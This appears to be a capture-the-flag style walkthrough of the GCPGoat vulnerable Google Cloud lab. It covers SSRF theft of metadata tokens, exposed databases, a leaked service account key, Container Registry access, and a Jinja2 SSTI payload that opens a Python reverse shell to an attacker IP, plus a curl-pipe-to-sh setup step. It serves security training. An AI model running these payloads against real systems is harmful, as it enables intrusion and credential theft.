GCPGoat Scenarios

https://gcpgoat.joshuajebaraj.com/

Scenario-1 Attacking Compute Engine

./create-scenario-1.sh

Web Server: 35.194.173.109

2. Enumerating the web server and finding SSRF-

a. The web app fetches a user-supplied URL and shows the HTTP response-

b. Intercept the HTTP traffic in Burp Proxy and submit a Collaborator domain as the URL; we get an HTTP interaction from 35.194.173.109, confirming the SSRF-

3. Exploiting SSRF-

Header- Metadata-Flavor: Google

Note: The "Metadata-Flavor: Google" HTTP header is required on every request to the GCE metadata server, so the SSRF must allow us to add it to the forwarded request.

URL- http://169.254.169.254/computeMetadata/v1/?recursive=true&alt=text

We are able to fetch the metadata of the Compute Engine instance, which includes the attached service account's email and scopes and, via the token endpoint, an access token usable from outside the VM.
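The recursive dump comes back as one "path value" line per key. The script below, an added example for this write-up and not code from GCPGoat, parses that text, picks out the service account, flags scopes broad enough to reach Cloud Storage (the access the later scenarios abuse), and lists the follow-up paths worth pulling through the same SSRF. The SAMPLE response is constructed; real output contains more keys.

```python
"""Parse the flattened metadata the SSRF returns (recursive=true&alt=text)
and summarize what matters for the next step. Added example for this
write-up, not code from GCPGoat; the SAMPLE text is constructed."""
from __future__ import annotations

METADATA = "http://169.254.169.254/computeMetadata/v1/"
SA = "instance/service-accounts/default/"

# Scopes that let a stolen instance token reach Cloud Storage or everything.
BROAD_SCOPES = {
    "https://www.googleapis.com/auth/cloud-platform",
    "https://www.googleapis.com/auth/devstorage.read_only",
    "https://www.googleapis.com/auth/devstorage.read_write",
    "https://www.googleapis.com/auth/devstorage.full_control",
}

# Paths worth pulling through the SSRF after the recursive dump.
FOLLOW_UP = [
    SA + "token",                 # bearer token usable from the attacker's machine
    "instance/attributes/",       # startup-script and custom attributes
    "project/attributes/ssh-keys",
]

# Constructed sample of the alt=text response: one "path value" line per key,
# paths relative to /computeMetadata/v1/. Repeated paths carry list values.
SAMPLE = """\
instance/hostname web-1.c.example-project.internal
instance/service-accounts/default/aliases default
instance/service-accounts/default/email 123456789012-compute@developer.gserviceaccount.com
instance/service-accounts/default/scopes https://www.googleapis.com/auth/devstorage.read_only
instance/service-accounts/default/scopes https://www.googleapis.com/auth/logging.write
project/project-id example-project
project/numeric-project-id 123456789012
"""


def parse_metadata_text(text: str) -> dict[str, list[str]]:
    """Turn 'path value' lines into {path: [values]}; a path with no value maps to ''."""
    data: dict[str, list[str]] = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        path, _, value = line.strip().partition(" ")
        data.setdefault(path, []).append(value)
    return data


def summarize(data: dict[str, list[str]]) -> dict:
    """Extract the identity the VM runs as and what its token can reach."""
    scopes = data.get(SA + "scopes", [])
    return {
        "project": data.get("project/project-id", [""])[0],
        "service_account": data.get(SA + "email", [""])[0],
        "scopes": scopes,
        "broad_scopes": sorted(s for s in scopes if s in BROAD_SCOPES),
        "follow_up_urls": [METADATA + p for p in FOLLOW_UP],
    }


if __name__ == "__main__":
    s = summarize(parse_metadata_text(SAMPLE))
    print(f"project={s['project']} service_account={s['service_account']}")
    print("broad scopes:", ", ".join(s["broad_scopes"]) or "none")
    for url in s["follow_up_urls"]:
        print("fetch next (with Metadata-Flavor: Google):", url)
```

The token endpoint returns JSON with an access_token that works against the Google APIs with an Authorization: Bearer header; what it can do is capped by the scopes shown here as well as by the service account's IAM roles, so a devstorage scope on an over-privileged default service account is exactly what turns an SSRF into bucket access.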

Scenario-2 Attacking SQL instance

./create-scenario2.sh apna-sql-instance

SQL instance: 35.185.167.208

2. Connecting to the publicly accessible MySQL instance-

Note: This scenario assumes there is no authentication on the database; in the real world you are more likely to find weak credentials. A Cloud SQL instance is reachable like this when it has a public IP and its authorized networks allow any source (0.0.0.0/0).

Scenario-3 Attacking Google Kubernetes Engine

./create-scenario3.sh

2. Scenario Info-

GKE lets a user set up a Kubernetes environment without much hassle. By default, applications running in pods are not exposed to the outside world; to reach a service from outside the cluster there are three common ways:

  1. NodePort
  2. LoadBalancer
  3. Ingress

Sometimes an application exposed via NodePort holds sensitive data, or is an internal service that was never meant to be reachable without authentication. A NodePort is opened on every node in the cluster, so it becomes reachable from the internet wherever a VPC firewall rule allows that port to the nodes' external IPs.

3. Finding out publicly exposed mongodb instance-

a. Type the command below in Cloud Shell to find the external IPs of the nodes

kubectl get nodes -o wide

b. Port scanning and service version scanning-

nmap -Pn --disable-arp-ping -vv -n -sS -T5 -p- 34.80.95.15 35.221.170.253 35.194.173.109
nmap -Pn --disable-arp-ping -vv -n -sS -T5 -p 22,3389,30003 34.80.95.15 35.221.170.253 35.194.173.109 -sV --version-all

Port 30003 is interesting: it lies in the default Kubernetes NodePort range (30000-32767), and Nmap is unable to determine the service running on it.

c. Manually enumerating the port-

nc 34.80.95.15 30003

4. Connecting to MongoDB-

mongo --host 34.80.95.15:30003
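The quickest way to turn an open port in the 30000-32767 range into a named service is to match it against the cluster's NodePort services. The script below is an added example, not GCPGoat code: SVC_JSON is a constructed stand-in for the output of `kubectl get svc -A -o json` and OPEN_PORTS for the nmap result on the three node IPs from the page. It reports every open NodePort-range port per node, resolved to the service behind it where one matches.

```python
"""Correlate ports found open on the GKE node IPs with the cluster's NodePort
services. Added example, not GCPGoat code; SVC_JSON stands in for the output
of `kubectl get svc -A -o json` and OPEN_PORTS for the nmap result, both
constructed here."""
import json

NODEPORT_RANGE = range(30000, 32768)  # kube-apiserver default --service-node-port-range

SVC_JSON = json.dumps({
    "items": [
        {"metadata": {"namespace": "default", "name": "mongo"},
         "spec": {"type": "NodePort",
                  "ports": [{"port": 27017, "nodePort": 30003, "protocol": "TCP"}]}},
        {"metadata": {"namespace": "default", "name": "kubernetes"},
         "spec": {"type": "ClusterIP",
                  "ports": [{"port": 443, "protocol": "TCP"}]}},
    ]
})

# Open TCP ports nmap reported per node external IP (the three IPs from the page).
OPEN_PORTS = {
    "34.80.95.15": {22, 30003},
    "35.221.170.253": {22, 30003},
    "35.194.173.109": {22, 30003},
}


def nodeport_services(svc_json: str) -> dict:
    """Return {nodePort: 'namespace/name -> servicePort/proto'} for every NodePort service."""
    out = {}
    for item in json.loads(svc_json)["items"]:
        spec = item["spec"]
        if spec.get("type") != "NodePort":
            continue
        ns, name = item["metadata"]["namespace"], item["metadata"]["name"]
        for p in spec.get("ports", []):
            if "nodePort" in p:
                out[p["nodePort"]] = f"{ns}/{name} -> {p['port']}/{p.get('protocol', 'TCP')}"
    return out


def correlate(open_ports: dict, svc_json: str) -> list:
    """List (ip, port, service) for every open port in the NodePort range.
    A NodePort is bound on every node, whichever node runs the pod, so the same
    service shows up on each IP. Ports in range with no matching service are
    still reported: kubectl may have been pointed at a different cluster."""
    known = nodeport_services(svc_json)
    return [
        (ip, port, known.get(port, "unmatched NodePort-range port"))
        for ip, ports in open_ports.items()
        for port in sorted(ports)
        if port in NODEPORT_RANGE
    ]


if __name__ == "__main__":
    for ip, port, svc in correlate(OPEN_PORTS, SVC_JSON):
        print(f"{ip}:{port}  {svc}")
```

Seen from the defender's side the same correlation is the audit: any NodePort service fronting a datastore with no authentication, combined with a firewall rule opening the NodePort range to 0.0.0.0/0, is the exposure this scenario demonstrates.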

Scenario-4 Attacking Google Cloud Storage

./create-scenario-4.sh gokuvsvegeta

2. Scenario info-

A public-facing Cloud Storage bucket is the most common misconfiguration in a GCP environment. Users often create buckets with public access so that data stored in them can be consumed by external applications; sometimes this leaks sensitive information, as here where a service account key is readable by anyone.

3. Bucket leaking sensitive information-

https://storage.googleapis.com/gcpgoat-366620/
https://storage.googleapis.com/gcpgoat-366620/service-key.json
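Listing a bucket anonymously at https://storage.googleapis.com/<bucket>/ returns an XML ListBucketResult. The script below is an added example, not code from GCPGoat: it pulls the object keys out of a constructed listing, flags names that look like credentials or dumps, and reads the identity (project, client_email, key id) out of a constructed service account key whose private_key is a placeholder rather than real key material. The same key_identity check is what you would run on the file before using it in scenario 5.

```python
"""Check a publicly listable GCS bucket for obviously sensitive objects and
pull the identity out of a leaked service account key. Added example, not
from the GCPGoat page; the XML listing and key file are constructed samples
(the private key is a placeholder, not real key material)."""
import json
import re
import xml.etree.ElementTree as ET

# Constructed stand-in for GET https://storage.googleapis.com/<bucket>/
LISTING_XML = """<?xml version='1.0' encoding='UTF-8'?>
<ListBucketResult xmlns='http://doc.s3.amazonaws.com/2006-03-01'>
  <Name>gcpgoat-366620</Name>
  <Contents><Key>index.html</Key><Size>512</Size></Contents>
  <Contents><Key>service-key.json</Key><Size>2345</Size></Contents>
  <Contents><Key>backups/db.sql.gz</Key><Size>10485760</Size></Contents>
</ListBucketResult>"""

# Object names that deserve a closer look in any public bucket.
SENSITIVE = re.compile(
    r"(service[-_]?key|credential|secret|\.pem$|\.key$|\.sql(\.gz)?$|\.env$|id_rsa)",
    re.IGNORECASE,
)

# Constructed service account key file; the private_key field is a placeholder.
KEY_JSON = json.dumps({
    "type": "service_account",
    "project_id": "gcpgoat-366620",
    "private_key_id": "0123456789abcdef",
    "private_key": "-----BEGIN PRIVATE KEY-----\nPLACEHOLDER\n-----END PRIVATE KEY-----\n",
    "client_email": "storage-admin@gcpgoat-366620.iam.gserviceaccount.com",
    "client_id": "111111111111111111111",
})


def list_keys(xml_text: str) -> list:
    """Return every object key in a ListBucketResult, ignoring the XML namespace."""
    root = ET.fromstring(xml_text)
    return [el.text for el in root.iter() if el.tag.rsplit("}", 1)[-1] == "Key"]


def flag_sensitive(keys: list) -> list:
    """Keep only keys whose names suggest credentials, keys or database dumps."""
    return [k for k in keys if SENSITIVE.search(k)]


def key_identity(key_text: str) -> dict:
    """Identify whose key this is without touching the private key material."""
    key = json.loads(key_text)
    if key.get("type") != "service_account":
        raise ValueError("not a service account key file")
    return {
        "project": key["project_id"],
        "email": key["client_email"],
        "key_id": key["private_key_id"],
    }


if __name__ == "__main__":
    keys = list_keys(LISTING_XML)
    print("objects:", keys)
    print("sensitive:", flag_sensitive(keys))
    print("key belongs to:", key_identity(KEY_JSON))
```

A leaked key is a long-lived credential that keeps working until it is deleted in IAM; rotating it (not just re-securing the bucket) is the remediation.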

Scenario-5 Privilege escalation Using a Service account

  1. Deployment
./create-scenario-5.sh

2. Scenario info-
Google Container Registry stores our container images in a Cloud Storage bucket in the project (artifacts.<project-id>.appspot.com, or a region-prefixed variant). So anyone with access to that bucket, such as the holder of the key leaked in scenario 4, can download the images.

3. Save the service-key.json and use it-

gcloud auth activate-service-account --key-file=service-key.json

4. Listing the containers stored in Google Container Registry-

gcloud container images list

gcr.io/gcpgoat-366620/secret

5. Running the container and reading the secret-

docker run  --rm  -it  gcr.io/<project-name>/secret:v1 sh

secret- super-secret

Scenario-6 Privilege Escalation in Compute Engine

./create-scenario-6.sh

SSH into the compute instance and run the command below to start the web server-

curl https://raw.githubusercontent.com/JOSHUAJEBARAJ/hack/main/setup.sh | sh

2. Scenario info-

The default Compute Engine service account attached to the VM does not follow the least privilege principle: with the default access scopes it can read Cloud Storage buckets in the project, so any code running on the VM, including an attacker's shell, inherits that access.

3. Accessing the web server via the public IP of the compute instance-

http://35.194.173.109/

4. Enumerating web server-

a. Directory brute-forcing-

dirsearch -u http://35.194.173.109/

b. Visiting /page returns HTTP status 500 Internal Server Error-

c. Brute-forcing parameters using Arjun-

name parameter found!

d. Visiting the URL with the name GET parameter-

http://35.194.173.109/page?name=test

5. Testing the name parameter for injection vulnerabilities-

a. Finding SSTI

Wappalyzer detects that the web app uses the Flask framework (Jinja2 templates).

The SSTI payload is executed: the page renders 49!

http://35.194.173.109/page?name={{7*7}}

6. Exploiting SSTI to get a reverse shell-

Payload-

{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c  'import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"<Your_ip>\",<Port>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/bash\");'").read().zfill(417)}}{%endif%}{% endfor %}
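The payload reads as one line but is a three-step gadget chain. The script below is an added example for this write-up, not code from GCPGoat, and reproduces the chain in plain Python so each part can be checked: walk every direct subclass of object via a tuple literal, pick the one whose name contains "warning" (warnings.catch_warnings), hop from an instance's _module attribute to the warnings module and from there to __builtins__, and use the __import__ it finds. It stops at the import instead of calling os.popen, so it has no side effects; the names found are asserted, not assumed.

```python
"""Reproduce, in plain Python, the gadget chain the Jinja2 SSTI payload walks,
so each piece of the payload can be read. Added example; not code from the
GCPGoat page. It does not spawn a shell: the last step returns the imported
module instead of calling popen() on it."""
import warnings  # the payload relies on this module already being loaded in
                 # the target process, which is always true for a Flask app


def find_gadget():
    """Payload step 1: ().__class__.__base__ is object; __subclasses__() lists every
    class directly derived from it, and "warning" in x.__name__ selects
    warnings.catch_warnings (the check is case-sensitive, so WarningMessage is skipped)."""
    for cls in ().__class__.__base__.__subclasses__():
        if "warning" in cls.__name__:
            return cls
    raise LookupError("no class with 'warning' in its name is loaded")


def reach_builtins(cls):
    """Payload step 2: x()._module is the warnings module object; its __builtins__
    attribute is the interpreter's builtins, which the template sandbox-less
    environment never hands out directly."""
    return cls()._module.__builtins__


def import_via_gadget(name):
    """Payload step 3: __builtins__['__import__']('os') in the payload, then
    .popen(cmd).read(); here we return the module and stop."""
    builtins_obj = reach_builtins(find_gadget())
    # A module's __builtins__ is a dict outside __main__; handle both shapes.
    importer = builtins_obj["__import__"] if isinstance(builtins_obj, dict) \
        else builtins_obj.__import__
    return importer(name)


if __name__ == "__main__":
    gadget = find_gadget()
    print("gadget class:", gadget.__module__ + "." + gadget.__name__)
    os_mod = import_via_gadget("os")
    print("reached:", os_mod.__name__, "with popen =", os_mod.popen)
```

The reverse-shell payload wraps exactly this in {% for %}/{% if %} so the template engine does the iteration. On the fixing side, the bug is that the name parameter is concatenated into the template source; passing it as a template variable (render_template_string("Hello {{ name }}", name=name)) makes it data instead of code.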

7. Listing buckets from the compute instance (the instance's service account has the permission)-

gsutil ls

References-

https://gcpgoat.joshuajebaraj.com/
